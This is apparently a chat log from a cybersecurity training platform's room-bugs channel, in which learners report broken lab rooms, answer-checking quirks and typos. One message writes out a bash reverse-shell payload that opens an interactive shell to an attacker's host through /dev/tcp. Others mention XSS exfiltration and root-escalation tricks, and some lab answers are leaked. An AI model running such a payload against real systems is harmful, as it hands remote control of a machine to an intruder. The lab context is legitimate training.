#room-bugs

@flint plover please don't use that word here, it's a slur

Room: 25 days of Chris. Task 23, Day 18. I can't login to the hacker forum after I did some wrong xss scripting. Can anyone please fix it. Thanks.

in the room lfibasics

Question six

the last user in that file is THM

but that isnt accepted as answer

#room-help

No, the hint says its the last user in the file, that has to be the right answer

Its a straight up tutorial, nothing to do wrong here

lmao nevermind

Course/room: Learn Linux

Task number: 30 [Section 5: Advanced File Operations] ln

Question: How Would I link /home/test/testfile to /tmp/test

I answered (by mistake): ln /home/test/testfile -s /tmp/test

The questions was correct.

But isn't the right answer just: ln /home/test/testfile /temp/test?

with a space in between, of course ^

Refresh the page and check again @wheat fractal

That might be the answer tolerance

oh, I can see that the answer is corrected now!

In the basic room ..rpmetasploit, i noticed a problem that may be platform wide. it's not a huge deal, but then again ...

not sure how its matching .. since supplied answer may be contained in the real answer but it is not the answer itself

it also appears to be a case insensitive match (very important for some things) password123 != PASSWORD123

The answers work with some tolerance which can mess up the answers indeed

It's especially visible with rooms like tmux remux

there is a wrong answer in malresearching room
in task 3 que no 3
the answer is SHA-384 but its SHA-512

Hey guys, the hint for Day 17 in the room Advent of Cyber is (really) wrong. It says: If you've tried more than 30 passwords from RockYou.txt, you are doing something wrong! The password needed is in line 905679 in rockyou.txt

In the linked rockyou file in the description its on line 905678.. So thats not correct eiter.

That task has an issue you have to use the standalone Hydra room

Thanks. I went through SSH and read the flag that way

https://tryhackme.com/room/webappsec101

trying this lab

got stuck at what is the username of a logged on user?

i trided bruteforcing using dirsearch gobuster

but the username didnt came in the result

anyone?

@carmine jetty ??

Wrong place I suppose?

not at all

It's a bug?

@carmine jetty that looks suspiciously like a scam. Please clarify.

I just want to know about it

can you explain

You want to know about the random HTML page you uploaded?...

With an out of date PayPal "Confirm your account", and a nice big Hyperlink?

no, that's why I upload it, can you explainno, that's why I upload it, can you explain

Looks like a scam. Don't click the link, and ignore it.

6 hours ago I got that message in the email

Definitely a scam, given it wants you to have completed it 14 months ago.

Delete, and move on.

means it's a scam link? I just found out that it was written there I had to fill in my credit card data

Also, that is definitely not a room bug, so A) please don't post suspicious stuff without asking first, and B) definitely don't post it in #room-bugs 😆

Yes, it's a scam

all right thanks bro

I get a lot of emails like that

starting from paypal, amazon to bank accounts

Hello, does anyone else have troubles with the "Revenge" room? I can't reach the web page

That's still brand new so I'd appreciate if you could wait. It will have been tested.

Okay 🙂 thanks @eternal summit

I got root on Jeff but the room is not taking the user flag
I am getting the Uh-oh! Your answer is incorrect.
100% sure the answer is correct
anybody getting this error message also?

never mind ... i figured it out

Hi guys! In the Splunk-room. Are there any knows bugs there? https://tryhackme.com/room/bpsplunk #21 and #31 is killing me!

Missunderstood #21 and found the old URL for cummunity 🙂

But should maybe be updated..

#31 that is!

It's on the list

There's a problem on Intro to x86-64 in Task 4

...

Would you like to explain @outer fossil

https://tryhackme.com/room/scripting

In the task 3, the UDP server does not respond to my "hello" msg.

I'm following all instructions given, and its byte encoded.

Screenshot

?

Can you also post it in #room-help and ping me please

Hello, I am unable to access the content on the VM in the burp suite room. Has anyone else had an issue where the connection just times out? (intercept is off/ tried with and without burpsuite running)
https://tryhackme.com/room/rpburpsuite

Not necessarily a bug but the admin password in task 6 of the post-exploitation room doesn't match the one that's shown in task 2. Might want to edit that one before people get confused. https://tryhackme.com/room/postexploit

Aw shit I’ve been meaning to fix that

reeee

I blame skidy

https://media.discordapp.net/attachments/680459914828972076/733472585412640829/skidy.gif

working through blaster and the very first question asks for how many ports are open and this is not consistent with my scan results from nmap

the answer is supposedly a single digit when I have twice returned more open ports than what was accepted for an answer.

@twilit forge it's not an issue with the room. It's an issue with windows

https://tryhackme.com/room/csp Task 5 suggests using beeceptor to exfiltrate data via XSS. This is somewhat misleading for the Sandbox challenges afterwards (Task 7) as the administrator bot cannot reach outside the THM network.

A pointer for the user to use an attack-machine http server (a simple python server will do), instead of beeceptor, for the challenges should fix that issue

https://tryhackme.com/room/sqlibasics
Task 3: It's not really a bug, the images are just getting 404'd

@next bluff

Hi I want to report that im founding more open ports than the correct answer in Blaster

Known issue, that's windows boxes in General. @median pollen

You'll have to guess the answer by process of elimination

You'll have to guess the answer by process of elimination
@faint ridge Ok thank you will do that

Not really a bug but it'd be good to update question 3 in https://tryhackme.com/room/googledorking guessing the number is fine but the point is different 🙂

@dusky junco ^^ 🙂

Thanks (: will get to this when I get to a PC after work

Anyways thanks to the new external IPs on the CSP room, the bug I reported is now fixed, and also a bunch of other attack challenge problems as well. Good stuff 🙂

thanks

Room Corp. The network setting seems incorrect. And since this is a room for Appblocker. I can not go in and adjust the network settings.

The room task asked to download a powershell script from github

rooms never have internet access, I’ve asked the creator before to change it as it’s misleading within the room. You have to download it on your personal machine and host it on your vm

i see

thanks alot!

@twin tapir

That's post exploitation basics, task 5

Could probably do with an update 😁

sheeessh

@obsidian kiln shhhhh I was never here

You need to be more specific than that

me thinks you may be doing something wrong

Calling Dark sir

Anyone have their Kali's firefox not connecting to Jacks .thm local domain? I connect to the IP, just not the tld

you need to add it to your /etc/hosts file

format is:
ip hostname.tld

got it, thx

I remember that before....

I think I also remember doing the exact same thing before too.. lol going through the about:config like crazy man

Thanks mate

Hello, since 2 days I am not able to go in any room : TryHackMe print infinite "loading" ....anybody got an idea I can resolve it ?

I hope I am in the right channel guys 🙂

Cannot transfer files(only image files) via FTP in room: agent_sudo.

Hello

I've just found a little issue in the room "Geolocating images". Task6 image 3, the image is reversed. In reality if you look at the scene from this location, you'll see that the eiffel tower is on the left and the Montparnasse Tower on the right. you can check on the map here : https://upload.wikimedia.org/wikipedia/commons/thumb/e/e2/Meudon_map.svg/1920px-Meudon_map.svg.png
That's why at the beginning I was searching from the other side of Paris. This is not totally an error because some webcam inverse the images but I think it's worth mentionning

I think that's @green steppe's room? 🤔

oh wow

thats a....

strange..... bug

rppsempire

bug very cool room

i never imagined using yandex for reverse search

I misstyped ctrl b shift s instead of ctrl b shift ! and its still correct
https://tryhackme.com/room/tmuxremux
Task 4

Refresh

It’ll be fixed

Like magic

https://tryhackme.com/room/owasptop10
Task: [Day 7] Cross-site Scripting
The reflected page is broken (see screenshot)
The URL in teh question should be http://10.10.93.135/reflected?keyword=Term%20from%20URL..., without the param the page gives an error.

https://tryhackme.com/room/printerhacking101

Running python pret.py and targeting the box IP address. Nothing comes up and shuts down the connection

Checked my openvpn, and its connected

You can’t run PRET on that room

It even says

It won’t work

Steel Mountain:
To minimise issues, the msfvenom payload you generate should be exe-service otherwise you will get 1053 errors when starting the service.

Say what now?

Mayor, we've been over this before.

It makes it a hell of a lot smoother, and works better.

It makes a lot more sense to generate a service payload if you're using it as a service.

My current theory is that staged payloads work because it spawns a new process or whatever before windows kills it, but why let windows kill it? Prevent the error.

owasptop10> task 26 > q2. I didn't change my usertype to admin and still i am able to access the flag.

@wheat fractal your room is borked

@obsidian kiln Is it broken for you too? I seems to only break if you submit the correct solution which should give you the flag (((i think))))

No

It's not borked necessarily @obsidian kiln

@upper viper depending on how you encode your token, it won't be decoded properly

And will bork the machine

Para

That sounds like you should have written more resilient software

I thought I wrote a note on tha5

@eternal summit LOL @wheat fractal thank you very much. I just base64 encoded like in the previous challenge, shrug

I mean,

You say resilient software

I say that you should take into account misconfigurations unintentionally created by the developer

@upper viper it's something that could come up in the real world and you need to be prepared for that

@wheat fractal Affirmative, cheers 😆

😁

You call it a bug, Microsoft calls it an undocumented bonus feature.

it's a feature

can someone help me with this
my OWASP matchine ip is not is not opening this "evilshell.php" only loading 😫

i am able to ping ip but not able to get on this site

i have issue with kenobi

what issue?

look at this ouptput @wheat fractal @obsidian kiln

@wheat fractal any issue with command or issue with machine

owasptop10> task 26 > q2. I didn't change my usertype to admin and still i am able to access the flag.
Was this intended in the machine?

Why am I being pinged? 🤔

see

look at this ouptput @wheat fractal @obsidian kiln
@high palm here @obsidian kiln

Oh, I can see that, but why am I getting pinged about it?..

no one was replying so thought someone help me

That looks like a Layer 8 error to me. Try asking over the #room-help -- one of the mentors will give you a hand.

ok

thanks

Im doing the steel mountain room but the user flag has 2 "?" symbols making it incorrect

have you tried the flag without the two symbols?

nope

it worked

lol

thanks

finished this room a few days ago and there was no problem with any flag 😉

you're welcome

hey. In /room/zthobscurewebvulns Task 12 I was able to use the given JWT to get the flag. There should be the need to change smth in the data so that one can not use the give Token.

Doing it the proper way is so much fun 🙂

In Agent-Sudo I got root exploiting ||the membership in lxd group||. Because none of the found CVEs was right I looked into a writeup and found out, that this was not the way intended to get root. Maybe this is a bug?

oh thats funny

not a bug, just an unintended

Okay 😉

Im in an intro room and I am i not use it is providing the flag
help?

#room-help #room-hints #site-support

Can someone help me out with a thing ?

Can I remind you that this channel is for room bugs?

Not sure if its a bug or not ... so where can I speak with someone ?

Is it a bug with a tryhackme room?

its probably not a bug so where shoul i ask for help
i basically ran one script and cant figure out why didnt appear one directory when supossly should have

(linpeas and linenum)

#room-help for help with rooms

thanks

I don't think "Get-DomainUser" is working in Post Exploitation box with PowerView. Nor "Get-DomainGroupMember". But "Get-NetUser" and some others are working. I'm not as familiar with PS yet, so not sure what the problem may be

@azure valve Make sure you're in a 64bit powershell

I think the uploadvulns Room has a bug in Task 5 , #1. I entered /ressources, but it's actually /resources.

Or is it the typo-prevention thing again?

answer regex strikes again

Answer tolerance it’s on all rooms

Okay. In this case it's misleading me 🙂 Copied the word an still get 404 😄

Refresh the page. It's the answer tolerance.

Refresh the page. It's the answer tolerance.
@obsidian kiln That's a nice possibility to correct such things! Thanks for the hint 🙂

In the owasp top10 day 8, following the reflected link gives an error. Visit reflected from the home page seems to work

question 4 task 5 for new room Physical Security Intro is misleading i think

Not really a bug just a misspelling in one of the rooms. Introtox8664 in Task 2 right before it shows the command e asm.syntax=att it says “The run” when I think it meant to say “Then run”

I found a bug in the room Agent Sudo. One of the questions asks for a password for the SSH service - Task 3, Question 5. The answer is not the same as the actual password that is used to login using the SSH username and password

probably just answer tolerance

in room: https://tryhackme.com/room/postexploit

task 6 Enumeration w/ Server Manager

the wrong password is given to the player/user
it says password:P@$$W0rd
but the password for the admin user is: password123@ (which has been given before)

Yeah I need to change it I think skidy made a password change when he went in to fix activation

okay : D

Hello! Is there any way to report a question inside a room to be reviewed by the maker?

just ask your question here, the person will pick it up

say what is wrong with the room, link the room, and a screenshot as most of the times a picture speaks 100 words @nimble pewter

Thanks for your understanding!

In the room Sublist3r (rpsublist3r) in Task 4 Question #3 the correct answer is "admin". But there is not a subdomain admin.nbc.com

wdym? dig +short admin.nbc.com

got 66.77.124.21

@azure valve Make sure you're in a 64bit powershell
@eternal summit Still acting up for me, I dont know

I just got to the end of the NMAP room in the beginner section. The vulnerability listed in the hint does not show in the result of the scan... I ran nmap --script vuln -ipaddress-

That isn't the correct syntax by the looks of it

oh..then my bad..lol

Can you post an actual screenshot in #room-help please?

Sorry just closed it, I can go back in and try to redo it.

actually it's still up

Hello, I have issue on OWASP Top 10 [Day 7] Cross-site Scripting section. When I deploy VM I'm getting error from nodejs(Express.js)

I'm tried 2 times. Fyi.

Go to /

Then follow the link to reflected

Omg. Okey. Thx

For the marketplace room I was able to make the web server crash and restart.

and had to do the attack again

Is it possible that the deployed machine isn't configured as it supposed to be? I am working on a Simple CTF room and it's showing incorrect answer error to the right answer?

Can you, please, give Blaster more resources? I can't launch gobuster without the website crashing.

Check your connection

!vpnscript

@ https://tryhackme.com/room/rpmetasploit
https://darkstar7471.com/resources.html >> https://www.darkstar7471.com/resources.html
Missing www may cause confusion for some users

https://tryhackme.com/p/DesKel's embeddedhacker.com website is down and has been down for weeks so all of his writeups are inaccessible :( There's one writeup here here: https://tryhackme.com/room/25daysofchristmas

Deskel changed their hosting, the writeups still exist I believe

Can someone please help me with sort of bugs, i just subscribed, got some basic linux know-how, using the Browser Kali machine.

Room: Vulnversity
NMAP Question 2: If i scan my machine it says 5 ports are open, in the Video it shows a 6. Port open a 3333 running Apache. Well no Apache at my machine. (Is the Browser based Kali machine bugged or am i supposed to search for open ports inside the Video?)
Question 3: I don' even have a squid proxy on my Browser Kali machine?
Question 7: Well everyonone knows web server running on 3333, but same problem, no webserver running on my Browser Kali machine?
Task 3 Gobuster: Can't do this task without active Apache Server, so i can't find the directory that has an upload form page?

Have you terminated and redeployed the machine?

You need to deploy the target VM in the room @tepid yoke

Your attacking machine and the target ate different

uff my bad, thanks!

has 'undiscovered' been tweaked since it was on vulnhub? im running the same stuff and so far it has seemed the same... ||but i cant get the authorized_keys working, even though i write it to the location...|| think it may be a bug...

what?

You didn't specify a room 😄 unless I'm blind

You didn't specify a room 😄 unless I'm blind
@hazy tiger undiscovered. i remember it from vulnhub and even went back to my writeup. this is the path, but i cant ||ssh in with the key||. ive made sure all permissions are correct and everything too...

oh... it was released yesterday. maybe it has been taken down

https://tryhackme.com/room/undiscoveredup

Yes it has 😄

oh ok

Not reaaaaally a bug, but https://tryhackme.com/room/introexploitdevelopment Task 4 exploit section is confusing and misunderstands python execution on the attacker vs victim machine, and goes on a bit of a wild experimentation when all you need really is || payload = "bash -c 'exec bash -i &>/dev/tcp/"+lhost+"/+"+lport+" <&1'"||

Did wonder about that when I glanced through it earlier...

yeah, there's also some missunderstandings about URL encoding vs base64 encoding...

I've been asked to run through that room for a uni workshop on Thursday, so I'll have a look beforehand and tweak my stuff as necessary, then possibly send it to the creator 🙂

👍 rock on (I finished it but it defo could use some cleanup)

@icy elbow @obsidian kiln thanks for the feedback. as I mentioned in the room im new to exploit development and was not aware there was an easier solution. im more than happy to rewrite the payload with your suggestion, i simply used the first thing I found that worked. also, if you're willing to explain the misunderstanding between URL vs base64 encoding im happy to correct that as well. it may read like a writeup because I adapted it from a writeup I kept. i made the room in an attempt to educate those similar to my skill level. i was conscious of the fact that i needed to change the language to better represent a walkthrough, it was not my intention to give a convoluted explanation but to show the process of trial and error. im happy to correct those areas as well. I appreciate the feedback.

@icy elbow i updated the room using your suggestion. lmk the inaccuracies regarding URL vs base64 encoding and ill fix those as well 👍🏽

Let me give it a look and see how I can help cd, defo appreciate you making the room don't take me wrong. It talks about some very interesting topics. Also, I may be wrong here about the encoding but let's see if I can explain myself.

Let's see, in task 3 you describe payload.encoded as being necessarily encoded in base64 (while sometimes this may be true, in our case this is not necessarily so) We can see with payload.encoded that instead of merely testing if the website is vulnerable, we are sending data (the shell) over a network back to our attacking machine. In order for data to be properly transmited, it needs to be encoded with base64.

which then led you to do this when creating your payload

and there it does make some sense since you're trying to send a ton of characters which might break the payload when sending it through a URI (even though it does not break here - see the example ahead), and base64 encoding can be a really good way to avoid those problems (specially if you use something like urlsafe_b64)

However for a simpler reverse shell payload, you might not need any encoding at all - like the one I shared - or simple URLencoding could sufice to resolve the problem

But my original comment was, admitedly, a bit off the mark because I did not use your socket solution. So I apologize for that.

but even in your socket solution, a payload:

would work without having to be encoded (url or otherwise, though it still works when URLencoded) - just tested it on my own script just now 🙂
So, as we can see the base64 encoding requirement was somewhat added by making a few assumptions over what payload.encoded meant in the msf module.

because it's passed to the command line as is in the cgi vulnerability

And yeah, we're all learning. Hopefully this helps clear up a few ideas. Good job on contributing a room (a pretty good idea of a room too). I have yet to do that. So thanks, and also thanks for adressing some of my concerns 🙂

Finally, I suspect that many of the https://gtfobins.github.io/ reverse shell payloads would have worked which is always a good reference if you want to include it btw. 👍 thx for reading @maiden sorrel

Or PayloadsAllTheThings, for that matter

going to the site for the deployed xxs playground in the owasp top 10 room gives me this

Go to /

Then follow the link

thx

@icy elbow that was really insightful thank you. I did make a false assumption about what payload.encoded was doing and i see now it was just insurance. I've added those changes to the room I really appreciate you pointing these things out.

Task 22 Day 17 Advent of Cyber has the wrong password.

Please fix this!

It's been reported several times and I've personally pushed for it to be fixed as it just needs the VM swapped with another THM upload. This hasn't happened yet.

SO ANNOYING!

Heya - /room/rpnmap's question #14 shows there to be a space in the answer, but the doco has it as an = sign, not a space.

If you refresh, does it change?

i already answered with a space...

That doesn't answer my question. If you refresh the THM page, does it change?

let me rephrase then. I already answered with a space, so I cannot see what the prompt is for the correct answer. it accepted my answer with a space in.

refreshing did not change anything on that question, visibly, for me

let me rephrase then. I already answered with a space, so I cannot see what the prompt is for the correct answer. it accepted my answer with a space in.
@wooden forum When you refresh, whatever you answered is replaced with the "correct" answer.

Are you 100% sure that a space is not also correct?

aha, i see what you're saying.

refreshing still had it as a space. and no, i am not 100% sure of that. however, i am 100% sure that the answer as-is from the doco, was not accepted by the THM page. 🙂

Unfortunately you can't specify multiple answers to be accepted

right.

fair enough

hi, tryhackme team. right now am playing with Cross-site Scripting room (https://tryhackme.com/room/xss) so am stuck in Task 8 question 3 and 4. i submit the right payload and I get the alert message "Hello" and still don't get the flag !!! for the payload am evasion the filter using Unicode character .. any idea

and i don't know if it's right to write the payload here or not

What the heck is WackoPicko

@turbid valley basically that room has a crap ton of problems and it’s being remade, I would just wait till it’s remade

@turbid valley basically that room has a crap ton of problems and it’s being remade, I would just wait till it’s remade
@twin tapir ah no mention of that in room. thank you.

?

what happen with this room

@turbid valley As Cry said, it is being remade. Wait until it's done

thank u I just started it.. they should mention that room had some issues it's better for every memeber ..

OWASP Juice Shop - Questions do not do a good job of explaining that you need to submit the flag for each question specifically Task #7. This is commonly a problem in the help chats. cc: @warped talon

Room SQL Injection Unit 7 - task 3. The answer is not ||splitraining||?

Hey. Are there any known bugs with the Dumping Router Firmware room? I have around 5 questions with "Your answer is incorrect". I'm following the writeup and the so called incorrect answers should work.

Room SQL Injection Unit 7 - task 3. The answer is not ||splitraining||?
@lethal dagger you have a typo there

Thank you!

I am doing Day 21 of Advent of Cyber, first question. The binary has the value ||4|| moving into var_ch but that it isn't the right answer. The correct answer is ||1||. I'm a little confused, also, because there is no variable coming up as local_ch in the binary in Radare. Please help!

Don't worry I was looking at the wrong binary.

Hey, may i ask you something?
https://darkstar7471.com/ seems not working.

go to http://darkstar7471.com/

tut tut tut

Has Dark let his TLS expire?

No, it just doesn't let you in with https, then redirects

How odd

Yup

Very odd indeed

@obsidian kiln He needs to fix his DNS IIRC, it's www.

If an answer comes back with "Uh oh, undefined", i take it ive got it wrong? Just wondering because others i have got wrong say "incorrect" or something along those lines.

Sometimes anti virus like bitdefender stops you from entering key words

Steel Mountain: replacing the binary is not the same as the unquoted service path exploit that the room claims.

The room tells you to overwrite the binary, which is not exploiting the unquoted service path.

For the eight millionth time

It is done.

Musical Stego - https://tryhackme.com/room/musicalstego. The intended link is https://pastebin.com/LZKTB4ET this page is no longer up making the room impossible to continue

User who created is active so hopefully can be fixed

@wheat fractal I believe this is yours

It is

Hint gives you the information necessary to continue progress

Yup, it has been updated since

ah didnt see that, amazing

Evening, not a bug, just a "dead link": in the Burp Suite room (https://tryhackme.com/room/rpburpsuite), task #9, we can read

For some additional practice on using Intruder, check out the older Learn Burp Suite room here on TryHackMe

"Learn Burp Suite room" is a link to https://tryhackme.com/room/learnburp, that we cannot access anymore, it's a private room

use /jr

smal thing not working in the ice room. in task 3 you need to use cvedetails.com but I cant find the correct CVE on that site. I did find it on exploit-db.com

||https://www.cvedetails.com/cve/CVE-2004-1561/||

nope it’s there

damn your right. for some reason I got on this page https://www.cvedetails.com/product/31619/?q=Icecast.

https://imgur.com/jDlvwrL

This supposed to be like this?

? ;-;

make sure you are doing everything right

I did this room and there were no issues

I am did not tamper with cookies first time and the second time

Disc : says i should change User-Type from 'user' to 'admin' to see flag at /admin

but its seeable without doing thta 0.o?

or maybe i read smthn wrong lemme chk

Yeah it’s a bit of an unintentional @elder rover

I haven’t been able to update the VM for that task/day

In the Mr Robot CTF room the host appears to be down. I have tried waiting ten minutes and restarted the VM multiple times

is this an issue for anyone else?

How can I tell?

was just trying to do an nmap scan

Ignore that it's not windowsm

@pine mirage what was your input for NMAP

just nmap -sV ip

but then I used threader3000 and it did a more specific input. hold on ill grab that

Because I just nmaped it with no issues

ah. strange. my input isnt off right?

I put nmap -A -sV ip

the other thing is that if I go to the domain in browser it just gives a bad HTTP request

as if it wasnt up

Are you using your own VM?

Yeah I have Kali on a VM

Run this

!vpnscript

Run that see if it fixes the issue

Ok ill try that. Thanks. so far my VPN hasnt given me any errors but I will try this

Sometimes I won't yet there is

no errors there

Try giving -Pn flag to nmap.

Hey guys, I am struggling with the "Kenobi". In Task 3 I want to mount the /var folder of the attacked machine, but I cannot do this because I am missing /sbin/mount.nfs . I cannot install it via apt because my attacking machine is apprently not connected to the internet. What am I missing here?

Hey, gonna remove as it has the flag but that looks right to me @wheat fractal double check how you are copy and pasting it into the answer box

Thanks (: mind DM'ing me to double check? 😄

sure

all sorted - API being iffy. Refreshing the page sorted it 👍

@obsidian kiln plz

There's also a typo in Zero Logon room should be "proof" not "poof"

Fixed and fixed

??

terminate, redeploy

#room-help

one question. i just did the mr robot machine and it only gave me 90 point when everyone has 210, why is that?

Questions that don't require answers use to award points

?

oh, you mean used to give points?

yea

oh ok

thx

Think i have found a bug on the Linux Challenges room, i have detailed it as much as i can in this doc.

Uhhhh

File scary

i was gonna post it all here but i wanted it as one message cause OCD

if you want i can put it all in discord?

https://products.groupdocs.app/viewer/view?FolderName=2e51f585-36f3-451c-9509-a8ed0fbc1b99&FileName=linuxctfbug.docx#page-view-2

ah that's neat!

btw can you let me know when its sorted so i can get flag4? i refuse to cheat

I think you might be in as the wrong user

but GARRY

The writeup says Bob

wait it doesnt say to change to bob, and i dont have his pword?

OH AFPOihjOFGUIHBAO@GN

Is that not the first question in the room? 😁

🤣

I QUIT
im going to bed

Night!

*Note to self: Find a box that relies on attention to detail and get Iron to do it next week*

id fail on the first hurdle

i was trying to look at his crontab too at somepoint too actually lmao

couldnt do it ofc

Hehe

Ironclad's CV:

• Lacks attention to detail
• Great at making BS up

Very minor typo in the https://tryhackme.com/room/networkservices2 Task8

I assume this is trivial to fix. If not I don't mean to be annoying with this extremely minor bug report

No problem, thanks for letting us know!

I’ll dispatch the great @obsidian kiln for this. Any chance you could resolve this? “knoww” in Task 8 of /room/networkservices when you get 5 minutes please?

No problem, thank you for looking at it :)

Ah, yep, sure

❤️

Thanks homie :3

@torpid glade just as you are a floating point, I am simply a blob

I feel connected

We are connected by being very abstract objects. We are brothers now.

Sorted @torpid glade 👍
(You sent me to the wrong room @dusky junco 😡)

😆

LMAO!

I thought I included 2 at t#he end there

Mb Muirl

😆

Hi, Im new to THM, How do I know for sure that I joined the room of the activity Im doing? The basic Linux room says access denied when I create the required txt file and try and access it to complete the task. Also, the Metasploit activity doesnt seem to have a room to join. Apologies if its a dumb question 🙂

Also, If I want to play around with some basic nmap and metasploit, How do I create a custom instance for me to scan and attack?

No worries, posted in the the room help channel 🙂

hiii doing the room Blue and i got a different vuln from the nmap scan
what i got was different from the actual answer which i just googled based on the hint
it was an smbv2 vuln not an smbv1

Hi
i think there maybe a bug in the room Wireshark101 (https://tryhackme.com/room/wireshark)
At Task 8 in #3 (What is the timestamp for packet 12, only including month day and year?). There is a day difference between the answer and what wireshark shows me. The month and the year are correct, only the day is different.

It’s due to time zones, I’m aware of the issue I just can’t fix it rn

Wireshark Room: Spelling mistakle on Task 6, shown here FPT but should say FTP

keep thinking im dyslexic

or should i say dyxlecis

@twin tapir

Go fix 😁

Its a good room so far btw, im liking it, so Kudos 🙂

sir, have you not heard of the FPT protocol

File Pransfer Trotocol?

It doesn't exist

Go fix

Bug Muir to fix em

it’s fixed

Good Cry

Now it says PTF ??

Joking lmao

Should see the number of spelling and grammar mistakes in Cry's rooms before they're tested

Wait did I really put PTF

no, it says FTP

Joking lmao
@twin tapir

Honestly the thing is it really wouldn’t surprise me if I put PTF

its something i'd do too tbh

also @obsidian kiln fun fact I don’t think cmn gave me any grammar mistakes...

which means gg time to find them all

Yeah, I saw about 6 in the first few tasks😆

Within HackPark if you don't use metasploit and just search exploitdb for the LPE, the exploit listed which it wants you to use asks you to rename a different file with your exploit than supposed to. Just curious as to what happened there. I thought metsploit pulls from exploitdb anyhow and would have the same instructions for that. Not sure I want to give it all away, but did confuse me for a bit.
Maybe I'm the only one not using metasploit..... 😦 lol

@azure valve there are two vulnerabilities in that service (on this box) -- one is a pure permissions thing (overwriting the binary itself), the other is a true USP vuln. The exploit probably tells you to use the USP rather than the file overwrite.

And MSF pulls from the Rapid7 DB, although I'm not sure how it comes into this 😆

In the OWASP Top 10 room task 20 the machine has been changed no ? Because the XSS stored playground is now a login/register rather than a comment and that didn't display flags

In Wireshark 101 ( great room for intro to Wireshark, but ) ARP q3 answer must contain spaces which is not shown in answer format - confusing a lot 😉

In the room "brainstorm", the amount of ports for question 2 is incorrect. I scanned it twice on t different machines and even checked the walkthrough to make sure I ain't missing something. The only answer it accepted was ||6||, but it should be ||3||.

If it's a windows room, that's a windows thing

in Advent of Cyber day 13 unable to see google chrome

google chrome is not installed

task hint says Figure out what the user last was trying to find out

anyone

You don't need google chrome

Look at writeups

ok then .exe file is key ?

Look at writeups
@hazy tiger

yep doing that

The writeups are outdated for day 13, as retro was swapped with blaster

Go through blaster (it's guided), for the answers @high palm

ok

@maiden sorrel Hey -- can I DM?
Forgot one thing from that room 🙂

Hey guys! I'm doing the room Google Dorking, I'm at the task 3 Enter: Search Engine Optimisation and link in question 3 is broken. Not really a problem as I can "bruteforce" answer but I just wanted to report it

i have a problem with the common linux privesc i have downloaded the LinEnum.sh on the remote machine but when i try to run it it gives me syntax error in line 6

Screenshot.

Probably not a bug

#room-help with a screenshot

And MSF pulls from the Rapid7 DB, although I'm not sure how it comes into this 😆
@obsidian kiln Yea.... they used exploit-suggester. I was confusing the initial access exploit used exploit-db. It was like 3:30am and should have just read more instead of seeing metasploit and then ignoring the rest. lol My bad mate. The vuln I used though I believe is the same USP, but I also didn't see when it was supposed to run that service. Maybe once a day or never. Thanks for getting back to me

In Kenobi room I'm having problems with question 3.5 where I need to mount the NFS. I run the following command but it seems there is a permission issue

has https://tryhackme.com/room/theserverfromhell been taken down for a bit? there is no deploy button on the webpage for me. I have tried a couple of times but its not there.

@proper jasper I tested it, and haven't heard anything from the creator, so I'm going to assume it's a glitch.
I've added it back in

ok thankyou

Thanks @vocal sparrow will get that updated (:

Hello can someone fix the task 20 in OWASP 10 days please, it is now a login/register rather than a comment section in the XSS stored and can't display flags

it won't have been changed

I will send screen later but the task demand to post a comment and I don't have comment section

I dont know if someone else has this problem but there is no root flag in the Alfred room.

I deployed the machine two times but still no root flag in the given directory.

Hi there 🙂

I've run into a problem in the Burp suite room (https://tryhackme.com/room/rpburpsuite). I'm in step #2 of Task 10, and I'm looking for responses with the Set-Cookie header. I've been looking for a long time now and I can't find any. I assume that header is supposed to be included in the response to the login request to set the token, but I'm just not seeing it so I cannot continue. Am I missing something? Maybe they changed something in the OWSP Juice version that's deployed with the room machine?

the pic of machine-ip/stored from a writeup

the pic fof machine-ip/stored

of machine-ip/stored from the machine that I just lunch*

if someone can fix this pls 😩

obviously I tried to register then login but the comment section isn't there

IM SO DUMB

Sorry

it work perfectly

@wispy mirage You need to make sure that you are looking at responses not requests. If you see "Cookie:" then you're looking at requests.

Your site is amazing

@eternal summit yep, I know. Still no Set-Cookie header. Ended up using a custom location for the sequencer, although the room syas to wait for 10k requests and it's been 5 minutes and it is at 7 requests 2 tokens captured :/

It's not the room, it's burp

#room-help

Wdy mean?

it doesn't seem like burp is being throttled as it is not consistent

like it will do 5 in a row then stop for a minute

and if I navigate to OWASP manually it also responds erratically, in fact I had to recreate the room machine because it stopped responding altogether

:/

also its weird that I'm at 26 requests with 3 errors and only 5 tokens captured

I think something might be broken

It's an issue with burp

The room works fone

OWASP is taking a very long time to respond through firefox

The sequencer just doesn't like it and doesn't work.

#room-help

well okay so what do I do from here

Go to #room-help

I'm using the stock kaly remote machine

Please?

sure I actually also wrote my issue there

hey @eternal summit just to confirm, there should be a Set-Cookie header in the response of the login request right?

Nope you're looking for a socket io one usually

Please use #room-help

This is not a bug with the room.

okay sorry not getting any responses there, thanks for your help though

Remember everyone is a volunteer, and it doesn't make it a bug.

yes I know and I am very grateful for any help I might receive

and sorry to insist (this will be my last message about the matter) but I do think it might be a bug with the room, or at least some version compatibility issue, or the instructions are outdated or something like that, because I'm following the instructions word for word and they don't match my findings. I believe I'm looking in the right place and what should be there isn't there so I think that's a bug. I attach a couple of screenshots that should clarify this further. Thank you and good day 🙂

It won't have changed

Other people have had it working today.

You see the socket.io requests? Look at those.

huh okay I feel dumb now don't know how I missed those

thanks for your patience

Room : The Cod Caper Problem : Machine down (restarted machine two times waited for a while to services to start still says machine down i tried to ping it doesnt work)

Hi!
In the room zthobscurewebvulns at the #18 after the token change the server dies immediately.

@dusky junco Hello, it seems that the answers #2 and #5 of Task3 in your Googledorking room are no longer up to date

Thanks @drifting lion I'll get this updated this afternoon

In the meanwhilst, here are the answers that the room expects:

Q2 is looking for: Nay
Q5 is looking for: googledorking.cmnatic.co.uk

I will get it updated shortly (:

anyone familiar with /room/ccpentesting

Just ask

wrong ch sorry.

i was just wondering why i was getting timed out during scans

both gobuster and dirb

changed -t to 100 still..

Most likely vpn issue

!vpnscript

If it proceeds go to tech support please

Thank you

The Blob Blog: Completed the room this evening and checking other peoples write ups I think I may have found a bug or something just so simple everyone else over looked it. ||I managed to use tar to get a root shell instead of finding and editing the .c files||

It's a feature

@vocal zinc feature right?

Lol what how

@tranquil vessel show meeeeeee

@vocal zinc feature right?
@verbal sedge precisely

Can you DM me

With how you broke my child

need to complete the room before you fix it

THM-CVE-BL0BM3SS3DUP-2838283

Have dm'd

Hello- There maybe a potential bug in OWASP juice box, task 5 question 2. I input mc.safesearch@juice-sh.op and the password provided Mr.N00dles and it comes back as invalid email and password. thought maybe i had to do "forgot your password" but when I go in there it will not allow me to fill anything out but the email

